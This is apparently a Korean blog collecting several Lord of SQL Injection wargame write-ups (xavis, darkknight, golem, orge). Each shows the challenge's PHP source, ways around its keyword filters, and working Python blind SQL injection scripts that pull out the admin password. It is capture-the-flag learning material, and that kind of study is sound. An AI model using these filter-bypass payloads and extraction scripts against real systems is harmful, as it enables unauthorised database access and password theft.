반응형
반응형
반응형

 

 

 

문제 소스 : 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php 
  include "./config.php"
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/regex|like/i'$_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'== $_GET['pw'])) solve("xavis"); 
  highlight_file(__FILE__); 
?>
 cs

 

 

  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis"); 

 

blind sqli 로 pw값을 구해내야 한다.

 

 

 

 

query : select id from prob_xavis where id='admin' and pw='1'or'1'='1' and length(pw) = 12#'

 

 

pw의 길이는 12이다.

 

 

 

 

 

 

blind sqli를 했는데 아래 범위에서 일치하는게 나오지 않았다..

string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$^&*()-_+="

 

 

 

 

그래서 범위를 123에서 255로 잡고 코드를 수정하여 다시 돌렸다.

 

 

그래도 안나왔다. 왜 그런가 보니...

 

query : select id from prob_xavis where id='admin' and pw='1' or '1'='1' and ord(mid(pw,1,1))>255#'

 

Hello admin

 

오우.. 255를 넘는다. 

 

500도 넘고 1000도 넘고..

 

 

 

유니코드인거 같아서

유니코드 한글 범위 AC00 - D7AF를 확인해 봤다.

 

 

query : select id from prob_xavis where id='admin' and pw='1' or '1'='1' and ord(mid(pw,1,1))>44032#'

 

Hello admin

 

query : select id from prob_xavis where id='admin' and pw='1' or '1'='1' and ord(mid(pw,1,1))<55215#'

 

Hello admin

 

 

44032와 55215 사이 범위임을 알 수 있었다.

 

그럼 이제 각 자리마다 11000개 가량을 시도해야한단 소리인데..

 

 

 

 

이진탐색을 이용해서 시도 횟수를 줄여야 할 것 같다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import urllib
import urllib2
import sys
import time
 
 
def binary_search_recursion(start, end , i):
    if start > end:
        return start
 
    mid = (start + end) // 2
 
    data = blind_sqli(mid, i)
 
    if "Hello admin" in data:
        start = mid + 1
        print mid
    else:
        end = mid - 1
 
    return binary_search_recursion(start, end, i)
 
def blind_sqli(val, i):
    payload = "1' or '1'='1' and ord(mid(pw,"+str(i+1)+",1))>"+str(val)+"#"
    payload = urllib.quote(payload)
    url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw="+payload
 
    print url
 
    opener = urllib2.build_opener(urllib2.HTTPHandler)
    request = urllib2.Request(url)
    request.add_header('User-Agent''Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
    request.add_header('Cookie''PHPSESSID=cookie')
    request.get_method = lambda:'GET'
    data = opener.open(request)
    data = data.read()
 
    return data
 
key = ""
for i in range(0,3):
    k = binary_search_recursion(44032,55215, i)
    key+=str(hex(k))
print key
 
 cs

 

코드를 쓱싹하고 짰다.

 

유니코드로 바꿔주면(0x -> %u) 한글 3글자가 나오는데 그걸 pw로 넘겨주면 된다.

반응형
저작자표시 비영리 동일조건

'WAR GAME > Lord of SQLi' 카테고리의 다른 글

LORD OF SQL INJECTION [iron_golem] 풀이  (0) 2019.11.14
LORD OF SQL INJECTION [DRAGON] 풀이  (0) 2019.11.13
LORD OF SQL INJECTION [nightmare] 풀이  (0) 2019.11.09
LORD OF SQL INJECTION [ZOMBIE_ASSASSIN] 풀이  (1) 2019.11.08
LORD OF SQL INJECTION [SUCCUBUS] 풀이  (0) 2019.11.07
반응형

DARKKNIGHT

 

문제 소스:

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php 
  include "./config.php"
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i'$_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=/i'$_GET[no])) exit("HeHe"); 
  $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'== $_GET['pw'])) solve("darkknight"); 
  highlight_file(__FILE__); 
?>
 cs

 

 if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight");

pw 검증 -> blind sql injection

 

 

if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");

substr => mid

= => like  로 우회

 

 

 

pw 글자 수 구하기

 

' 따옴표 필터링으로 인해 'admin'을 hex값으로 넣어서 string으로 인식하도록 함.

 

no = 1 or id like 0x61646d696e and length(pw) like 8

 

 

pw길이는 8. 이제 pw을 구하면 된다.

 

 

이전에는 mid(pw,1,1) like '0' 으로 하면 되었지만

' 따옴표을 필터링 하기 때문에 아스키 값으로 바꿔서 비교를 해야 한다.

 

ord(mid(pw,1,1)) like 48

 

 

 

풀이 코드 :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import urllib
import urllib2
import sys
import time
 
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$^&*()-_+="
key = ""
 
for i in range(8):
    for j in range(len(string)):
        #payload = "1' || '1'='1' &&(substring(pw,"+str(i+1)+",1)='"+string[j]+"')#"
        #payload = "1' || '1'like'1' &&(mid(pw,"+str(i+1)+",1) like '"+string[j]+"')#"
        payload = "1 or id like 0x61646d696e and ord(mid(pw,"+str(i+1)+",1)) like "+str(ord(string[j]))+"#"
        payload = urllib.quote(payload)
        url = "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?no="+payload
 
        print url
 
        opener = urllib2.build_opener(urllib2.HTTPHandler)
        request = urllib2.Request(url)
        request.add_header('User-Agent''Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
        request.add_header('Cookie''PHPSESSID=s9nkrte43d9mdtk5e0r6b54mfa')
        request.get_method = lambda:'GET'
        data = opener.open(request)
        data = data.read()
 
        if "Hello admin" in data:
            key += string[j]
            print "[*] Find Password!! Password is ["+key+"]"
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
 
 cs
반응형
저작자표시 비영리 동일조건

'WAR GAME > Lord of SQLi' 카테고리의 다른 글

LORD OF SQL INJECTION [GIANT] 풀이  (0) 2019.11.05
LORD OF SQL INJECTION [bugbear] 풀이  (0) 2019.11.04
LORD OF SQL INJECTION [golem] 풀이  (0) 2019.11.01
LORD OF SQL INJECTION [SKELETON] 풀이  (0) 2019.10.31
LORD OF SQL INJECTION [VAMPIRE] 풀이  (0) 2019.10.30
반응형

GOLEM

 

 

문제 코드:

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php 
  include "./config.php"
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and|substr\(|=/i'$_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'== $_GET['pw'])) solve("golem"); 
  highlight_file(__FILE__); 
?>
 cs

 

if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); 

 

pw을 비교하기 때문에 blind sqli로 pw을 구해내야 한다.

 

그러나

 

 

if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); 

 

로 인해서 or, and, substr(, = 을 사용할 수 없게 됐다. 대신 우회하여 사용해야 한다.

 

 

 

 

 

 

우회 방법은 아래와 같다.

 

or => ||

and => && (%26%26)

substr() => mid()

= => like

 

 

 

 

 

 

pw 길이 구하기

pw = 1' || '1'like'1' %26%26 length(pw) like 8%23

 

길이는 8이다. (이때까지 8이었으니 8로 때려 맞추면 된다.)

 

 

 

 

 

 

풀이 코드:

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import urllib
import urllib2
import sys
import time
 
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$^&*()-_+="
key = ""
 
for i in range(8):
    for j in range(len(string)):
        #payload = "1' || '1'='1' &&(substring(pw,"+str(i+1)+",1)='"+string[j]+"')#"
        payload = "1' || '1'like'1' &&(mid(pw,"+str(i+1)+",1) like '"+string[j]+"')#"
        payload = urllib.quote(payload)
        url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw="+payload
 
        print url
 
        opener = urllib2.build_opener(urllib2.HTTPHandler)
        request = urllib2.Request(url)
        request.add_header('User-Agent''Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
        request.add_header('Cookie''PHPSESSID=your_cookie_value_here')
        request.get_method = lambda:'GET'
        data = opener.open(request)
        data = data.read()
 
        if "Hello admin" in data:
            key += string[j]
            print "[*] Find Password!! Password is ["+key+"]"
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
 
 cs
반응형
저작자표시 비영리 동일조건

'WAR GAME > Lord of SQLi' 카테고리의 다른 글

LORD OF SQL INJECTION [bugbear] 풀이  (0) 2019.11.04
LORD OF SQL INJECTION [darkknight] 풀이  (0) 2019.11.02
LORD OF SQL INJECTION [SKELETON] 풀이  (0) 2019.10.31
LORD OF SQL INJECTION [VAMPIRE] 풀이  (0) 2019.10.30
LORD OF SQL INJECTION [troll] 풀이  (0) 2019.10.29
반응형

https://los.rubiya.kr

 

ORGE

소스 :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php 
  include "./config.php"
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i'$_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_orge where id='guest' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'== $_GET['pw'])) solve("orge"); 
  highlight_file(__FILE__); 
?>
 cs

 

 

if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");

 

이전 문제와 같이 orand를 필터링 하고 있다. ||&& 으로 우회해주면 된다.

 

 

 

 

if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 

 

입력한 pw가 저장된 pw와 같아야 한다.

orc 문제를 풀었을 때 사용했던 코드를 이용해서 blind SQL Injection을 해주면 된다.

 

 

orc 문제풀이:

https://mandu-mandu.tistory.com/302?category=772020

 

LORD OF SQL INJECTION [orc] 풀이

https://los.rubiya.kr Lord of SQLInjection los.rubiya.kr 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

mandu-mandu.tistory.com

 

 

 

패스워드의 길이를 구해준다.

https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=1%27%20||%20%271%27=%271%27%20%26%26length(pw)=8%23

 

query : select id from prob_orge where id='guest' and pw='1' || '1'='1' &&length(pw)=8#'

 

 

 

 

풀이 코드:

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import urllib
import urllib2
import sys
import time
 
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$^&*()-_+="
key = ""
 
for i in range(8):
    for j in range(len(string)):
        payload = "1' || '1'='1' &&(substring(pw,"+str(i+1)+",1)='"+string[j]+"')#"
        payload = urllib.quote(payload)
        url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw="+payload
 
        print url
 
        opener = urllib2.build_opener(urllib2.HTTPHandler)
        request = urllib2.Request(url)
        request.add_header('User-Agent''Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
        request.add_header('Cookie''PHPSESSID=your_cookie_vaule_here')
        request.get_method = lambda:'GET'
        data = opener.open(request)
        data = data.read()
 
        if "Hello admin" in data:
            key += string[j]
            print "[*] Find Password!! Password is ["+key+"]"
            break
        else:
            print "[-] Fail!"
        time.sleep(0.1)
 
 cs

 

pw을 구할 수 있다.

반응형
저작자표시 비영리 동일조건

'WAR GAME > Lord of SQLi' 카테고리의 다른 글

LORD OF SQL INJECTION [VAMPIRE] 풀이  (0) 2019.10.30
LORD OF SQL INJECTION [troll] 풀이  (0) 2019.10.29
LORD OF SQL INJECTION [darkelf] 풀이  (0) 2019.10.27
LORD OF SQL INJECTION [wolfman] 풀이  (0) 2019.10.26
LORD OF SQL INJECTION [orc] 풀이  (0) 2019.10.25

+ Recent posts

티스토리툴바